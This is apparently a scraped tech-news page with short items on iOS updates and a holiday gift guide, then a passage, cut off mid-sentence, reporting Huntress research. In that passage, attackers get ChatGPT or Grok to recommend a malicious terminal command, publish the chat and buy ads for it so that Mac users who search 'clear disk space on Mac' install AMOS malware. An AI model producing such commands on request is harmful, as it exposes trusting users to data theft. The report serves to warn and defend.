|
After roughly six weeks of beta testing, iOS 26.2 and related updates have finally been released for all users, delivering a number of new features, changes, and bug fixes.
|
|
Macworld's Filipe Espósito today revealed a handful of features that Apple is allegedly planning for iOS 26.4, iOS 27, and even iOS 28.
|
|
Engadget staffers spend the entire year poking, prodding and otherwise testing the latest tech gadgets. So we've got a pretty good handle on what's unique and interesting right now. We put together this list for anyone looking for a good gift for that tech-obsessed person on their gift list. Some of these are devices we've tested for our reviews and guides, others are items we bought for ourselves (or wish someone would buy for us). We've got more than 35 picks here, from nearly every member of the Engadget team. Chances are, you'll find a good gift or two for every tech nerd you know. Here are our favorite tech gifts and gadgets for 2025.
Best tech gifts and gadgets
|
|
Ever since reporting earlier this year on how easy it is to trick an agentic browser, I've been following the intersections between modern AI and old-school scams. Now, there's a new convergence on the horizon: hackers are apparently using AI prompts to seed Google search results with dangerous commands. When executed by unknowing users, these commands prompt computers to give the hackers the access they need to install malware.
The warning comes by way of a recent report from detection-and-response firm Huntress. Here's how it works. First, the threat actor has a conversation with an AI assistant about a common search term, during which they prompt the AI to suggest pasting a certain command into a computer's terminal. They make the chat publicly visible and pay to boost it on Google. From then on, whenever someone searches for the term, the malicious instructions will show up high on the first page of results.
Huntress ran tests on both ChatGPT and Grok after discovering that a Mac-targeting data exfiltration attack called AMOS had originated from a simple Google search. The user of the infected device had searched "clear disk space on Mac," clicked a sponsored ChatGPT link and — lacking the training to see that the advice was hostile — executed the command. This let the attackers install the AMOS malware. The testers discovered that both chatbots replicated the attack vector.
As Huntress points out, the evil genius of this attack is that it bypasses almost all the traditional red flags we've been taught to look for. The victim doesn't have to download a file, install a suspicious executable or even click a shady link. The only things they have to trust are
|
|